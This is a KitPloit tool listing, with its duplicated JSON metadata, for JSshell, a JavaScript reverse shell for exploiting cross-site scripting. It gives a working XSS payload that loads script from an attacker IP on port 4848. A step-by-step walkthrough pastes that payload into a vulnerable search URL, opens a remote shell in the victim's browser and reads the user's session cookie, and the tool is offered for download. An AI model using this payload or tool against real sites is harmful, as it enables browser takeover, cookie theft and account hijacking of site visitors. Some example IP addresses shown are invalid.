JSshell - A JavaScript Reverse Shell For Exploiting XSS Remotely Or Finding Blind XSS, Working With Both Unix And Windows OS

2020-06-06T21:30:00

Description

[![](https://1.bp.blogspot.com/-n8BaIm82kvg/Xss1tk-mNPI/AAAAAAAASrE/GfU5VEa22PwWq3y7cqvWpO0yIjTC5uKxACNcBGAsYHQ/s640/JSshell.png)](<https://1.bp.blogspot.com/-n8BaIm82kvg/Xss1tk-mNPI/AAAAAAAASrE/GfU5VEa22PwWq3y7cqvWpO0yIjTC5uKxACNcBGAsYHQ/s1600/JSshell.png>) JSshell - a JavaScript [reverse](<https://www.kitploit.com/search/label/Reverse> "reverse" ) shell. This using for exploit XSS remotely, help to find blind XSS, ... This tool works for both Unix and Windows operating system and it can running with both Python 2 and Python 3. This is a big update of JShell - a tool to get a JavaScript shell with XSS by s0med3v. JSshell also doesn't require Netcat (different from other javascript shells). **Usage** **Generate JS reverse shell payload: `-g`** **Set the local port number for listening and generating [payload](<https://www.kitploit.com/search/label/Payload> "payload" ) (By default, it will be set to 4848): `-p`** **Set the local source address for generating payload (JSshell will detect your IP address by deault): `-s`** **Set timeout for shell connection (if the user exit page, the shell will be pause, and if your set the timeout, after a while without response, the shell will automatically close): `-w`** **Execute a command when got the shell: `-c`** **Example usages:** * `js.py` * `js.py -g` * `js.py -p 1234` * `js.py -s 48.586.1.23 -g` * `js.py -c "alert(document.cookie)" -w 10` **An example for running JSshell:** This is an example for step-by-step to exploit remote XSS using JSshell. First we will generate a reverse JS shell payload and set the shell timeout is 20 seconds: ~# whoami root ~# ls README.md js.py ~# python3 js.py -g -w 20 __ |(_ _ |_ _ | | \_|__)_> | |(/_ | | v1.0 Payload: <svg/onload=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//171.224.181.106:4848"},999)> Listening on [any] 4848 for incoming JS shell ... Now paste this payload to the website (or URL) that [vulnerable](<https://www.kitploit.com/search/label/Vulnerable> "vulnerable" ) to XSS: `https://vulnwebs1te.com/b/search?q=<svg/onload=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//171.224.181.106:4848"},1248)>` Access the page and now we will see that we have got the reverse JS shell: __ |(_ _ |_ _ | | \_|__)_> | |(/_ | | v1.0 Payload: <svg/onload=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//171.224.181.106:4848"},999)> Listening on [any] 4848 for incoming JS shell ... Got JS shell from [75.433.24.128] port 39154 to DESKTOP-1GSL2O2 4848 $ established $ the $ shell $ $ $ help JSshell using javascript code as shell commands. Also supports some commands: help This help exit, quit Exit the JS shell $ Now let's execute some commands: $ var test = 'hacked' $ alert(hacked) $ And the browser got an alert: `hacked` $ prompt(document.cookie) $ And the browser print the user cookies: `JSESSION=3bda8...` $ exit ~# whoami root ~# pwd /home/shelld3v ~# And we quited! **Author** This created by shelld3v, [hacking](<https://www.kitploit.com/search/label/Hacking> "hacking" ) at HackOne and Bugcrowd with a secret account! This tool is inspired by JShell (s0med3v), using the BruteLogic payload. JSshell 2.0 will has some new features that include: * More payloads for `<img>`, `<script>`, ... * Some shortcut commands: print the current session, domain, endpoint, ... * Better GUI ... **[Download JSshell](<https://github.com/shelld3v/JSshell> "Download JSshell" )**

{"id": "KITPLOIT:2751138742638729202", "vendorId": null, "type": "kitploit", "bulletinFamily": "tools", "title": "JSshell - A JavaScript Reverse Shell For Exploiting XSS Remotely Or Finding Blind XSS, Working With Both Unix And Windows OS", "description": "[![](https://1.bp.blogspot.com/-n8BaIm82kvg/Xss1tk-mNPI/AAAAAAAASrE/GfU5VEa22PwWq3y7cqvWpO0yIjTC5uKxACNcBGAsYHQ/s640/JSshell.png)](<https://1.bp.blogspot.com/-n8BaIm82kvg/Xss1tk-mNPI/AAAAAAAASrE/GfU5VEa22PwWq3y7cqvWpO0yIjTC5uKxACNcBGAsYHQ/s1600/JSshell.png>)\n\n \nJSshell - a JavaScript [reverse](<https://www.kitploit.com/search/label/Reverse> \"reverse\" ) shell. This using for exploit XSS remotely, help to find blind XSS, ... \nThis tool works for both Unix and Windows operating system and it can running with both Python 2 and Python 3. This is a big update of JShell - a tool to get a JavaScript shell with XSS by s0med3v. JSshell also doesn't require Netcat (different from other javascript shells). \n \n**Usage** \n \n**Generate JS reverse shell payload: `-g`** \n \n**Set the local port number for listening and generating [payload](<https://www.kitploit.com/search/label/Payload> \"payload\" ) (By default, it will be set to 4848): `-p`** \n \n**Set the local source address for generating payload (JSshell will detect your IP address by deault): `-s`** \n \n**Set timeout for shell connection (if the user exit page, the shell will be pause, and if your set the timeout, after a while without response, the shell will automatically close): `-w`** \n \n**Execute a command when got the shell: `-c`** \n \n**Example usages:** \n\n\n * `js.py`\n * `js.py -g`\n * `js.py -p 1234`\n * `js.py -s 48.586.1.23 -g`\n * `js.py -c \"alert(document.cookie)\" -w 10`\n \n**An example for running JSshell:** \nThis is an example for step-by-step to exploit remote XSS using JSshell. \nFirst we will generate a reverse JS shell payload and set the shell timeout is 20 seconds: \n\n \n \n ~# whoami\n root\n ~# ls\n README.md js.py\n ~# python3 js.py -g -w 20\n __\n |(_ _ |_ _ | |\n \\_|__)_> | |(/_ | |\n v1.0\n \n Payload:\n <svg/onload=setInterval(function(){with(document)body.appendChild(createElement(\"script\")).src=\"//171.224.181.106:4848\"},999)>\n \n Listening on [any] 4848 for incoming JS shell ...\n\nNow paste this payload to the website (or URL) that [vulnerable](<https://www.kitploit.com/search/label/Vulnerable> \"vulnerable\" ) to XSS: \n`https://vulnwebs1te.com/b/search?q=<svg/onload=setInterval(function(){with(document)body.appendChild(createElement(\"script\")).src=\"//171.224.181.106:4848\"},1248)>` \nAccess the page and now we will see that we have got the reverse JS shell: \n\n \n \n __\n |(_ _ |_ _ | |\n \\_|__)_> | |(/_ | |\n v1.0\n \n Payload:\n <svg/onload=setInterval(function(){with(document)body.appendChild(createElement(\"script\")).src=\"//171.224.181.106:4848\"},999)>\n \n Listening on [any] 4848 for incoming JS shell ...\n Got JS shell from [75.433.24.128] port 39154 to DESKTOP-1GSL2O2 4848\n $ established\n $ the\n $ shell\n $\n $\n $ help\n JSshell using javascript code as shell commands. Also supports some commands:\n help This help\n exit, quit Exit the JS shell\n $\n\nNow let's execute some commands: \n\n \n \n $ var test = 'hacked'\n $ alert(hacked)\n $\n\nAnd the browser got an alert: `hacked` \n\n \n \n $ prompt(document.cookie)\n $\n\nAnd the browser print the user cookies: `JSESSION=3bda8...` \n\n \n \n $ exit\n ~# whoami\n root\n ~# pwd\n /home/shelld3v\n ~#\n\nAnd we quited! \n \n**Author** \nThis created by shelld3v, [hacking](<https://www.kitploit.com/search/label/Hacking> \"hacking\" ) at HackOne and Bugcrowd with a secret account! This tool is inspired by JShell (s0med3v), using the BruteLogic payload. JSshell 2.0 will has some new features that include: \n\n\n * More payloads for `<img>`, `<script>`, ...\n * Some shortcut commands: print the current session, domain, endpoint, ...\n * Better GUI \n...\n \n \n\n\n**[Download JSshell](<https://github.com/shelld3v/JSshell> \"Download JSshell\" )**\n", "published": "2020-06-06T21:30:00", "modified": "2020-06-06T21:30:06", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "http://www.kitploit.com/2020/06/jsshell-javascript-reverse-shell-for.html", "reporter": "KitPloit", "references": ["https://github.com/shelld3v/JSshell"], "cvelist": [], "immutableFields": [], "lastseen": "2022-04-07T12:02:53", "viewCount": 213, "enchantments": {"dependencies": {}, "score": {"value": 0.1, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.1}, "_state": {"dependencies": 1659876597, "score": 1659818015}, "_internal": {"score_hash": "db120ae01ada674c4717ff3f4c9b0b63"}, "toolHref": "https://github.com/shelld3v/JSshell"}